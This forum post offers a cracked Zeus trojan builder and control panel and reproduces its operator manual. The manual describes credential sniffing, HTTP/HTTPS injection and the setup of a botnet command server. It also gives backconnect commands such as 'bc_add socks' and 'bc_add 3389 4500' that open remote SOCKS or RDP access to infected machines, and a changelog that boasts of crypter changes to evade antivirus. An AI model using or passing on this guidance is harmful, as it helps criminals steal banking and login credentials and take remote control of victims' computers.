If you already have an account with us, please use the login panel below to access your account.

Results 1 to 1 of 1
  1. #1

    Zeus 6 - Cracked (Builder + Cpanel)

    compatible windows 7 - vista - xp - 2000 ...

    zeus 6 - cracked

    compatible windows 7 - vista - xp - 2000 ...

    1. description and features.
    2. setting up the server.
    2.1. http-server.
    2.2. the interpreter php.
    2.3. mysql-server.
    2.4. control panel.
    2.4.1. installation.
    2.4.2. update.
    2.4.3. file / system / fsarc.php.
    3. setting bot.
    4. working with backconnect.
    5. changelog.
    6. f.a.q.
    7. myths.

    = 1. description and features. =
    zeus - software to steal personal user data from remote systems, windows. on
    plain language of "trojan", "backdoor", "virus". but the author does not like these words, therefore, further documentation
    he will call this software "bot".

    boat is fully based on the winapi interception in usermode (ring3), this means that the bot does not use
    drivers or treatments in ring0. this feature makes it possible to run even on
    guest account. plus, it ensures greater stability and adaptability
    on next versions of windows.

    bot is written in visual c + + version 9.0 +, with no additional libraries are used
    (no msvcrt, atl, mfc, qt, etc. used). code is written with the following priorities (in descending order):
    1. stability (carefully checked all the results of the call functions, etc.)
    2. size (to avoid duplication of algorithms, repetitive calls, functions, etc.)
    3. speed (not the type of instruction while (1 ){..}, for (int i = 0; i <strlen (str); i ++){..}).

    functions and features bot:
    1. sniffer traffic for the protocol tcp.
    1.1. interception of ftp logins on any port.
    1.2. interception of pop3 logins on any port.
    1.3. the interception of any data from the traffic (a personal request).

    2. intercepting http / https requests to wininet.dll, ie all programs working with this
    library. this includes internet explorer (any version), maxton, etc.
    2.1. substitution ..

    3. the functions of the server.
    3.1 socks4/4a/5.
    3.2 backconnect for any services (rdp, socks, ftp, etc.) on the infected machine. you can
    access to a computer that is behind a nat, or, for example, that
    banned from the internet connection.
    3.3 getting a screenshot of your screen in real time.
    - other not leasted features ---

    = 2. setting up the server. =
    the server is the central point of botnet's control, it get reports from bots
    and sends commands. it is not recommended to use the "virtual hosting" or "vds", because
    with large botnet, the load on the server will increase, and this type of hosting is quite
    quickly exhausted their resources. you need a "dedicated server" (ds), the recommended minimum

    1. 2gb of ram.
    2. 2x cpu frequency 2 ghz,
    3. sata hard drive 7200rpm +

    bot requires http-server with php + zend optimizer, and mysql-server.

    note: for windows-systems is very important to edit (create) the following registry value:
    hkey_local_machine \ system \ currentcontrolset \ services \ tcpip \ parameters \ maxuserport = dword: 65534

    - 2.1. http-server. --
    as an http-server is recommended to use: for nix-systems - apache version 2.2+, for
    windows-systems - iis version 6.0+. we recommend that you keep the http-server on port 80 or 443 (this
    positive effect on bots number, as providers / proxy can block access to other
    non-standard ports).

    download apache:
    or iis:

    - 2.2. the interpreter php. --
    the latest version of the control panel designed for php 5.2.6. it is highly recommended
    use the version is not lower than this version. but in extreme cases of not less than 5.2.

    it is important to make the following settings in php.ini:

    safe_mode = off
    magic_quotes_gpc = off
    magic_quotes_runtime = off
    memory_limit = 256m; or higher.
    post_max_size = 100m; or higher.

    and recommended to change the following settings:

    display_errors = off

    also need to add zend optimizer (acceleration of the script, and run the protected
    scripts). we recommend version 3.3.

    we do not recommend to use php as http-cgi.

    download php:
    download zend optimizer:

    - 2.3. mysql-server. --
    mysql is required to store all data on botnet. the recommended version is not lower than 5.1.30, as well
    worth considering that when the control panel in the older versions have some
    problem. all table control panel, go to a myisam, it is important to optimize
    speed of work with this format, on the basis of the available server resources.

    we recommend the following changes to the mysql-server setup (my or my.ini):

    max_connections = 2000 # or higher

    download mysql:

    - 2.4. control panel. --

    2.4.1. setting.
    appointment of files and folders:
    / install - the installer.
    / system - the system files.
    / system / fsarc.php - a script to call an external archiver (section 2.4.3).
    / system / config.php - config file.
    / theme - the theme file (design), without zend can freely change.
    cp.php - control panel.
    gate.php - gate for bots.
    index.php - empty file to prevent listing of files.

    the control panel is usually located in your folder in the distribution server [php]. all contents of this
    folder, you need to upload to the server in any directory accessible by http. if you download it through
    ftp, all files you download in binary mode.

    to nix-systems exhibit the right:
    . - 777
    / system - 777
    / tmp - 777

    for windows-systems:
    \ system - the right to full write, read only for users of the under which the access
    via http. for iis this is usually iusr_ *.
    \ tmp - as well as for the \ system.

    once all files are downloaded, you need a web browser to run the installer on the url
    http://server/zeus_folder/install/index.php. follow the instructions appeared, in the case of
    mistakes (you will be notified in detail) in the installation, check that all fields are correct,
    and correct installation of the rights to the folder.

    after installation, we recommend that you delete the directory install, and rename files cp.php (entrance to the
    panel) and gate.php (gate for bots) in any files you want (don't change the extension).

    now you can safely enter into the control panel by typing in the browser url renamed
    file cp.php.

    2.4.2. update.
    if you have a new copy of the control panel, and want to update an older version, the
    should do the following:

    1) copy the files a new panel in place of old ones.
    2) rename files cp.php and gate.php under their real names of your choice during installation
    the old control panel.
    3) in any case, the right to re-set the directory in accordance with paragraph 2.4.
    4) with a browser to run the installer for url http://server/direktoriya/install/index.php, and
    appeared to follow the instructions. the process of the installer may take a fairly large
    period of time, this is due to the fact that some tables may be re-records.
    5) you can use the new control panel.

    2.4.3. file / system / fsarc.php.
    this file contains a function to call an external archiver. at this time, archive
    used only in "reports:: search in files" (reports_files), and is called to load
    files and folders in a single archive. by default, set to zip archive, and is
    universal for windows and nix, so all you have to do is to install the system this
    archive, and to the right in its execution. you can also edit this file to work with
    any archiver.

    download zip:

    = 3. settings. =

    = 4. working with backconnect =
    working with backconnect regarded as an example.

    ip of backconnect-server:
    port for the bot: 4500
    port for the client application: 1080

    1) run the server application (zsbcs.exe or zsbcs64.exe) on the server has an ip in
    internet application specifies the port, which is expected to connect from the bot, and the port to
    which will connect the client application. for example zsbcs.exe listen-cp: 1080-bp: 4500,
    where 1080 - the client port 4500 - port to the bot.

    2) required command (bc_add service server_host server_port) will be sended to bot, where the service --
    port number or name * service, which needs to connect to the bot.

    * currently only supported in the name of socks, which allows you to connect to the built-in
    socks-bot server.

    server_host - a server that zapusheno server application. it can be used ipv4,
    ipv6, or domain.
    server_port - a port that is specified in the option cp server application. in this case, 4500.

    example: bc_add socks 4500 - as a result you get the socks,
    bc_add 3389 4500 - as a result you get rdp.

    3) now you need to wait for bot to connect to the server, in this period, any attempt to client
    applications to connect will be ignored (will disconnect the client). when bot
    connects, in server's console will be output line: "accepted new conection from bot ...".

    4) after connecting the bot, you can work with their client. ie you just
    connect to the server to the client port (in this case 1080). for example, if you gave
    command "socks", a port on the client you will be expected to socks-server, if port 3389, then
    you connect to 192.168.100:1080 as a normal rdp.

    5) after that, when you do not need backconnect of the bot for a certain service, you must pay
    click bc_del service server_host server_port, where all the parameters must be identical
    parameters bc_add, which must be removed. you can also use the spec. characters
    '*' and '?'.

    for example: bc_del * * * - deletes all backconnects from this bot.
    bc_del * 192.168 .* * remove all backconnects, connect to the server with ip 192.168 .*.
    bc_del 3389 4500 - specifically removes one backconnect.

    1) you can specify any number of backconnects (ie bc_add), but they should not be shared
    combination of ip + port. but if there is such a combination, will be launched first added.
    2) for each backconnect, you must run a separate server application.
    3) if the connection (drop server drop bot, etc.), bot will repeat the connection
    to the server indefinitely (even after rebooting the pc), until backconnect will not be removed
    (ie bc_del).
    4) as a service to bc_add, you can use any open port at the address
    5) the server application supports ipv6, but in principle at the present time, this support is not particularly
    6) you can launch the server application under wine. writing the same elf application is currently not
    7) it is recommended to use the option bp popular application server ports (80, 8080,
    443, etc.), because other ports may be blocked by the provider of bot.
    cool should not be allowed to connect to different bots on the same server port at the same time.
    9) the method of such a connection might be useful for bots, which are outside the nat, because sometimes
    windows firewall or isp may be blocked from the internet connection.

    note: this feature is not available in all builds bot.

    = 5. history. =
    conditional tags:

    * - change.
    [-] - fix.
    * - new feature.
    [version, 20.12.2008]
    * documentation in txt format. chm not used anymore.
    * now the bot is able to receive commands not only with the sending status, but when sending

    files / logs.

    * local data requests to the server and the configuration file is encrypted with rc4 (you can specify your key).
    * fully updated protocol bot <-> server. perhaps less load on the server.

    [-] fixed the bug that blocking bots on limited account.

    * written a new pe-crypter. now pe-file is very accurate and the most

    simulates the results of the ms linker 9.0.

    * updated build process in bilder.
    * optimized compression of the configuration file.
    * the new format is a binary configuration file.
    * rewritten the process of assembling the binary config file.
    * socks and lc are now working on a port.

    control panel:

    * the status of the control panel is beta.
    * changed all mysql tables.
    * control panel moving on utf-8 charset (may be temporary problems with

    displaying characters).

    * updated geobase.
    [version, 30.12.2008]
    * bofa answers are now sent as blt_grabbed_http (was blt_https_request).
    [-] small error when sending reports.
    [-] the size of the report could not exceed ~ 550 characters.
    [-] a low timeout for sending post-requests
    resulting in a blocked sending long (more than ~ 1 mb) report on slow
    compounds (not stable), as the theoretical implications - bot altogether stopped sending

    * in the case record and record type blt_http_request blt_https_request field sbcid_path_source

    (in the table will path_source) added path url.

    control panel:

    * updated redir.php.
    [version, 11.03.2009]
    [-] fixed bug in http-injections exists for all versions of bot. when
    use in the asynchronous mode wininet.dll, was lost time
    synchronize flows generated wininet.dll, with the result that, under certain conditions
    been an exception.
    * by an http-injection now also change the files in the local cache.

    the absence of this refinement can not always activate http-injection.

    * reduce the size of pe-file.
    [version, 28.03.2009]
    [-] minor bug in crypter, thanks to avira.

    * changed protocol of bot's commands.

    control panel:

    * completely rewritten control panel.
    * design rewritten to xhtml 1.0 strict (for ie does not work).
    * bot is now again able to receive commands only when sending a report on the online status

    (too high load).

    * updated geobase.
    [version, 02.04.2009]
    * when using http, the header user-agent is now read by internet explorer, rather than

    is a constant as before. theoretically, because of the constant user-agent'a, queries
    providers may be blocked or fall under suspicion.

    control panel:
    [-] fixed a bug displaying records containing characters 0-31 and 127-159.

    = 6. f.a.q. =
    q: what's the version numbers mean?
    a: a.b.c.d
    a - a complete change in your bot.
    b - the major changes that cause complete or partial incompatibility with previous
    c - correct errors, refine, add features.
    d - the number of refuds for the current version

    q: how does the generated bot id?
    a: bot id consists of two parts:% name% _% number%, where the name - the name of the computer (the result of
    getcomputername), a number - a certain number that is generated on the basis of some unique operating system data.

    q: why is the traffic is encrypted using symmetric encryption (rc4), but not asymmetric (rsa)?
    a: because the use of complex algorithms does not make sense, you need to encrypt only to hide
    traffic. plus rsa only in terms of not knowing the key is in the control panel will not
    ability to emulate her answers. and what meaning is to defend this (globally

    q: i damaged tables / files panel, what should i do?
    a: play the instructions specified in paragraph 2.5.

    8. myths =
    m: zeus uses a dll.
    a: false. there is only one executable pe file (exe). dll, sys, etc. not used.
    this myth has gone due to the fact that in some version for bot
    storage configuration used for files with such extensions.

    m: zeus uses com (bho) for the interception of internet explorer.
    a: false. used winapi interception of wininet.dll.
    Last edited by Pro Escrow; at .



Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts